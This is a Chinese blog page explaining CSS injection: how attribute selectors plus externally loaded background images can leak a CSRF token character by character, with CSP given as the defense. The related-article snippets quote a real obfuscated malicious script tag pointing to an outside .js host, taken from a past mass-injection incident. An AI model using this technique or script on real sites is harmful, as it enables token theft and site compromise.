css防注入,CSS注入

最新推荐文章于 2023-03-27 21:09:09 发布
最新推荐文章于 2023-03-27 21:09:09 发布
阅读量502 收藏
点赞数
文章标签: css防注入

css就已被安全研究人员运用于渗透测试当中。使用属性选择器和iFrame,并通过css注入来窃取敏感数据的方法。但由于该方法需要iFrame,而大多数主流站点都不允许该操作,因此这种攻击方法并不实用。这里为大家详细介绍一种不需要iframe且只需10秒,就能为获得CSRF token的方法。

什么是css注入

大家对XSS攻击都非常熟悉了,可能很少关注到css注入攻击,以下行为有可能受到css注入攻击:

从用户提供的URL中引入css文件

css代码中采用了用户的输入数据

原理

css属性选择器让开发者可以根据属性标签的值匹配子字符串来选择元素。 这些属性值选择器可以做以下操作:

1.如果字符串以子字符串开头,则匹配;

2.如果字符串以子字符串结尾,则匹配;

3.如果字符串在任何地方包含子字符串,则匹配;

4.属性选择器能让开发人员查询单个属性的页面html标记,并且匹配它们的值。

而在实际环境中,如果一些敏感信息会被存放在html标签内,如CSRF token存储在隐藏表单的属性值中,这使得我们可以将css选择器与表单中的属性进行匹配,并根据表单是否与起始字符串匹配,加载一个外部资源,例如背景图片,来尝试猜测属性的起始字母。通过这种方式,攻击者可以进行逐字猜解并最终获取到完整的敏感数值。

防御策略

想要解决这个问题受害者可以在其服务器实施内容安全策略(CSP),防止攻击者从外部加载CSS代码。

总结

作为前端开发者,我们与用户最近,也是网络安全防护的第一道线,要时刻关注来自各方面的网络攻击,保障用户信息的安全。

weixin_39569894
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CSS是如何发起攻击的?
petertanjinjie的博客
05-07 1663
CSS是如何发起攻击的写在开头我们熟悉XSS攻击和CSRF等攻击方式但是,其他有一种攻击,是CSS攻击,今天我就在这里做一个简单的解析第一种,CSS获取用户密码当用户输入指定的密码是:前端...
利用CSS注入(无iFrames)窃取CSRF令牌
前端大全
03-03 982
(点击上方公众号,可快速关注)编译:FreeBuf.COMhttp://www.freebuf.com/articles/web/162687.htmlCSS相信大家不会陌生,在百度百科中它的解释是一种用来表现HTML(标准通用标记语言的一个应用)或XML(标准通用标记语言的一个子集)等文件样式的计算机语言。那么,它仅仅只是一种用来表示样式的语言吗?当然不是!其实早在几年前,CSS就已被安全研究人
css注入,利用CSS注入(无iFrames)窃取CSRF令牌
weixin_30768925的博客
08-03 366
原标题:利用CSS注入(无iFrames)窃取CSRF令牌CSS相信大家不会陌生,在百度百科中它的解释是一种用来表现HTML(标准通用标记语言的一个应用)或XML(标准通用标记语言的一个子集)等文件样式的计算机语言。那么,它仅仅只是一种用来表示样式的语言吗?当然不是!其实早在几年前,CSS就已被安全研究人员运用于渗透测试当中。这里有一篇文章就为我们详细介绍了一种,使用属性选择器和iFrame,并通...
css注入,止最近流行的com/css/c.js注入的解决方法
weixin_36347877的博客
08-03 217
最近流行的病毒SQL代码:Script Src=;现已找到解决办法。直接复制下面的代码保存一个ASP文件#include到数据库连接文件就OK了至于已经存在的咋数据库直接运行一下代码替换update ass set title =replace(cast(title as varchar(8000)),’js代码段’,”)只能一个字段一个字段的进行替换,没有别的办法'--------定义部份---...
关于注入(css/c.js)
weixin_34187822的博客
12-29 174
  这几天朋友的网站天天被搞破坏的人恶意注入,也许是程序没写好的原因,数据库每个字段加了一段script(<Script Src=http://%63%2Enuclear3.com/css/c.js></Script>,而这个script地址时不时的有变化)。 用一些搜索引擎搜索下:/css/c.js></Script>,发现好多网站居然都有这个问题。...
css注入,禁止Webpack注入CSS
weixin_33705384的博客
08-03 322
使用webpack,我捆绑了一个项目。 一切都很好,并且可以正常工作。 但是,我想知道是否可以不将在TS文件中导入的(S)CSS直接插入JS。 确实,我想要的只是webpack创建的输出中的单独的CSS文件和js文件。让我尝试通过一个例子来说明。 我有两个TS文件:file1.tsrequire('./style1.scss');// some ts functions...file2.tsreq...
关于止sql注入css注入
Kind&红衣的博客
06-22 954
addslashes()函数和htmlspecialchars()函数addslashes(),向字符串中的预定义字符添加反斜杠进行转义,预定义字符:单引号(')双引号(")反斜杠(\)NULL这样的做法可以预sql的注入htmlspecialchars(),htmlspecialchars($kind_emailsAdd,ENT_QUOTES);对$lomd_emailsAdd 这个字符串变量...
关于css动态样式注入,你不知道的那些冷知识
weixin_33788244的博客
11-08 848
前言 作为一个前端,我们都听过结构,样式,行为分离;关于样式,我们都听过外联样式,内联样式和行内样式;关于这三者,什么权重啊,啊,对了,这些都不会出现在这篇文章里,这篇文章就说一些那些我们不怎么使用的,动态引入css样式的方法; 静态样式引入 前面说过外联样式,内联样式和行内样式,所谓外联样式,即样式文件是一个单独的css文件,通过lin...
css 变量注入
fly_666的博客
04-27 237
<template> <div class="box" :style="styleVar"> </div> </template> <script> export default { props: { height: { type: Number, default: 54, }, }, computed: { styleVar() { return {
CSS注入 2.0
好好睡觉
01-15 1682
CSS注入实现、CSS注入原理、
CSS注入CSS Inject」-crx插件
03-21
将任何托管CSS文件注入任何网页 允许将任何托管CSS文件注入任何网页。新(8/13/2012):**修复了导致扩展中断的部署错误。新功能(2012年5月5日):**更新为可与更新版本的Chrome配合使用(使用清单版本2)功能:**指定要注入的任何托管CSS文件(本地文件必须托管在http:// localhost /〜下) -Chrome的安全性限制)**单击可打开/关闭注入**仅本机JavaScript-不包含库或不必要的代码来拖慢您的速度为什么要这样做?:**这有助于主题网站(如Wordpress)或Tumblr。在某些情况下,您正在为网站模板开发复杂的样式表,但无法轻松更新服务器上CSS文件 **使用此插件:您可以处理本地主机托管CSS文件,只需单击保存,即可立即查看结果。不再需要将CSS复制和粘贴到服务器上或通过FTP将其复制到服务器上 **其他CSS操作插件仅注入自己的静态CSS,或使您复制并粘贴到盒子中。我敢肯定,还有其他一些用例。如果有,请告诉我! 支持语言:English
react-一个简单的注入CSS的React组件
08-15
一个简单的注入CSS的React组件
CSS injection 知识总结
01-21
现代浏览器都已不允许在CSS中执行JavaScript了,以前的CSS注入可以利用JavaScript协议在 url() 、 [removed]) 中执行Javascript代码从而实现XSS。但是目前CSS注入在窃取数据方面仍然是非常有用的,下面分别来分析一下。 CSS 注入 窃取标签属性数据 CSS中可以使用属性选择器,根据不同的属性选择标签。比如下面CSS选择含有a属性且其值为abc的p标签。 <style>p[a=abc]{ color: red;}</style> hello world 属性选择器还可以匹配值的一些特性,比如以XXX开头、以
css 注入,CSS injection 知识总结
weixin_39608613的博客
08-03 1173
现代浏览器都已不允许在CSS中执行JavaScript了,以前的CSS注入可以利用JavaScript协议在 url() 、 expression() 中执行Javascript代码从而实现XSS。但是目前CSS注入在窃取数据方面仍然是非常有用的,下面分别来分析一下。CSS 注入 窃取标签属性数据CSS中可以使用属性选择器,根据不同的属性选择标签。比如下面CSS选择含有a属性且其值为abc的p标签...
CSS注入 1.0
好好睡觉
11-09 1780
CSS注入CSS注入示例
安全基础第六天:css注入
最新发布
weixin_62870380的博客
03-27 1629
我是垃圾,没做出来,别看
止最近流行的com/css/c.js注入的解决方法
picerty的专栏
12-17 443
 止最近流行的com/css/c.js注入的解决方法   最近IE7漏洞的爆发,使得黑客们利用最新发现IE漏洞发起攻击的数量急剧增加,而相应补丁程序目前尚未完成开发,3天时间,被注入、挂马的网站已达两万之多,为解这燃眉之急,威盾安全专家们经过努力,找到了解决最近流行病毒SQL代码:Script Src=http://c.nu%63%6Cear3.com/css/c.js>的方法。方法步骤
html注入原理,CSS注入
weixin_28691741的博客
06-03 416
CSS仅仅只是一种用来表示样式的语言吗?当然不是!CSS就已被安全研究人员运用于渗透测试当中。使用属性选择器和iFrame,并通过CSS注入来窃取敏感数据的方法。但由于该方法需要iFrame,而大多数主流站点都不允许该操作,因此这种攻击方法并不实用。这里为大家详细介绍一种不需要iframe且只需10秒,就能为获得CSRF token的方法。什么是CSS注入大家对XSS攻击都非常熟悉了,可能很少关注...
css穿透(带案例详解)
浮游的博客
08-19 3947
问题背景 在使用vue构建项目的时候,引用了第三方组件库,只需要在当前页面修改第三方组件库的样式,以做到不污染全局样式。通过在样式标签上使用scoped,达到样式只作用到本页面的目的,但是此时再修改组件样式就不起作用了。 <div class="text-box" v-html="emotion(item.content)"></div> <style lang="stylus" scoped> .text-box{ color: #2e3135;
WHUCTF挑战:CSS注入、越权与安全总结
"这篇网络安全自学教程文章主要涵盖了WHUCTF比赛中的CSS注入、越权、csrf-token窃取以及XSS漏洞的总结。作者通过实际的CTF题目分享了学习过程和解题经验,旨在帮助读者理解和御这些常见的网络安全威胁。" 在网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值